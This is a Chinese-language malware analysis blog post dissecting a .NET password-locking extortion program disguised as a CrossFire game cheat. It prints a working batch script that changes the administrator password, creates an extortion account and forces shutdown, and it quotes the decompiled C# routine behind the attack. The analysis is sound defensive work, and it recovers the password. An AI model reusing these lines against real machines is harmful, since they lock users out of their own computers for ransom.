病毒木马查杀实战第013篇：一个基于.NET的“敲竹杠”病毒研究

前言

恶意程序发展至今，其功能已经从最初的单纯破坏，不断发展为隐私的窥探，信息的盗取，乃至如今非常流行的“敲竹杠”病毒，用于勒索。可见随着时代的发展，病毒的作者们往往也是想利用自己的技术来获取不义之财，变得越来越功利化了。而本系列文章也顺应了这个发展，从病毒讨论到木马，进而来到了“敲竹杠”病毒的讨论上来。

什么是“敲竹杠”病毒

其实“敲竹杠”病毒的行为很简单，它就是篡改我们的计算机的开机密码，然后病毒作者留下个人的联系方式，让受害的用户去联系他，花钱消灾。“敲竹杠”主要通过QQ群和邮件进行传播，经常会伪装成类似于“CF免费刷枪无毒软件”（如这次研究的CF.exe），“免费刷Q币”等极具诱惑性的名称，一旦用户点击运行，系统登陆密码就会被篡改。而普通用户遇到这种情况，往往无能为力，加上“勒索”钱财的数额一般并不大，所以花钱买密码的人也不在少数。由于这种病毒并不需要编写者具备很高深的技术水平，从而也就助长了“敲竹杠”的盛行。这里举一个最简单的“敲竹杠”代码的例子，它是一个批处理（.bat）文件：

@echo off
net user 姜晔 wojiushimima
net user 要密码加QQ123456789 wojiushimima /add
shutdown.exe -s -t 10

这里简单讲解一下上述代码。代码第二行的意思是将名为“姜晔”的账户密码修改为“wojiushimima”（我就是密码）。注意，在我的系统中，账户“姜晔”就是管理员账户，而大多数情况下，系统默认的管理员账户名称为“Administrator”，所以具体情况要具体分析。在此也呼吁大家不要将“Administrator”作为管理员账户名，免得被恶意程序所利用。代码第三行的意思是创建名为“要密码加QQ123456789”的账户，其密码也是“wojiushimima”。代码第四行的意思是在10秒后关闭计算机。运行上述代码，如图所示：

图1 运行“敲竹杠”病毒

程序运行10秒后，自动关机，再开机，如下图所示：

图2

可见，这里出现了两个账户，一个是原始账户，不过密码已经被修改了。另一个账户是病毒作者的联系方式，该账户的密码我们也是不知道的。至此，普通的计算机用户为了能够正常使用自己的电脑，也就只有去联系病毒作者，去买密码了。

什么是.NET

既然本文讨论的是一款基于.NET的“敲竹杠”，那么有必要在这里简单讨论一下什么是.NET。

其实.NET是微软设计的独立于操作系统之上的平台，可以将它看成是一套虚拟机，无论机器运行的是什么操作系统，只要该系统安装了.NET框架，便可以运行.NET可执行程序，享受基于.NET的各类服务。上面这句话是从用户角度出发的观点，如果从Windows系统的角度来理解，.NET就是一系列运行于Ring3层的DLL文件。

可能这么说依旧比较抽象，有兴趣的读者可以查询相关书籍进行进一步的学习研究。我个人觉得我们没必要过于在意这个定义，作为病毒分析人员，更重要的是掌握.NET平台的逆向分析方法。

.NET有一个特点，那就是无论程序是用C#，还是C++，或是VB编写，最终都被编译为.NET的中间语言IL。而静态分析.NET程序，就是用反编译工具将程序的指令字节反编译成IL指令或高级语言，通过阅读反编译代码掌握程序的流程与功能。由于.NET下的可执行文件同时保存有元数据与IL代码，其静态反编译出的代码具有极强的可读性，几乎等同于源代码。

.NET平台的反编译工具最为常用的是ildasm与Reflector。这里我打算选用后者进行分析。该软件目前已经变为收费版，大家可以在http://www.red-gate.com/products/dotnet-development/reflector/下载14天的全功能试用版。

“敲竹杠”病毒分析

这次的病毒样本名为“CF.exe”，从名称就可以看出它应该是和游戏“穿越火线”相关，伪装成是游戏的辅助类程序，实际上就是“敲竹杠”。但是它的特别之处就在于开创性地采用了.NET框架，瞬间显得与众不同起来。为什么我知道它采用了.NET框架呢？这是PEiD的功劳：

图3

那么接下来就使用Reflector来载入这个病毒样本。由于经过Reflector的分析生成的代码就如同源代码，所以很容易就能够找到恶意程序的核心位置：

图4

该函数的完整代码如下：

private void timer1_Tick(object sender, EventArgs e)
{
    this.j++;
    if (this.j <= 3)
    {
        this.label4.Text = "正在扫描CF网络漏洞\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if ((this.j <= 5) && (this.j > 3))
    {
        this.label4.Text = "正在监测CF模块SX动作\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if ((this.j < 10) && (this.j > 5))
    {
        this.label4.Text = "避开SX加载辅助模块\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
    }
    else if (this.j == 10)
    {
        this.label4.Text = "模块加载成功启动中\x00b7\x00b7\x00b7";
        this.progressBar1.Value = this.j;
        ResetUserPassword(Environment.UserName, "razggcd");
        MessageBox.Show("反外挂联盟提示您：绿色游戏健康生活 共同创建公平的竞技平台 ！为了您的计算机安全 请向QQ：1460459195 充值30QB并添加好友索要密码 ！ 谢谢配合 ！", "提示信息", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
        CreateNTUser("加Q1460459195", "razggcd", "");
        LockWorkStation();
    }
}

很明显，程序通过计数器的不断增加，从而显示不同的文字，这也就给用户造成了一种假象，以为游戏辅助已经生效，似乎正在运行一样。而当计数器自增到10的时候，就会执行最后一个if语句。该语句中的ResetUserPassword用于将用户密码修改为“razggcd”，之后显示一段信息，让用户与病毒作者联系，以获取密码，实现“敲竹杠”。接下来创建名为“加Q1460459195”，密码为“razggcd”的用户。最后锁定工作站保护其免受未经授权者使用。这一整套流程，与我之前讨论的批处理版的“敲竹杠”大同小异。可见，虽说本病毒改变了外在的形式，但是其内部机理还是没有变化的。

通过上述分析，我们已经获取了密码，那么也就大功告成了。

小结

相比较于之前所分析的病毒木马，“敲竹杠”的分析其实还是非常简单的。特别是这种基于.NET的程序，反编译出来的程序就可以等同于源程序，比汇编代码容易理解多了。由于现在“敲竹杠”是主流，所以我以后会选取一些比较有代表性的“敲竹杠”进行研究。希望大家能够提高防范意识，让这些程序的编写者们无机可乘。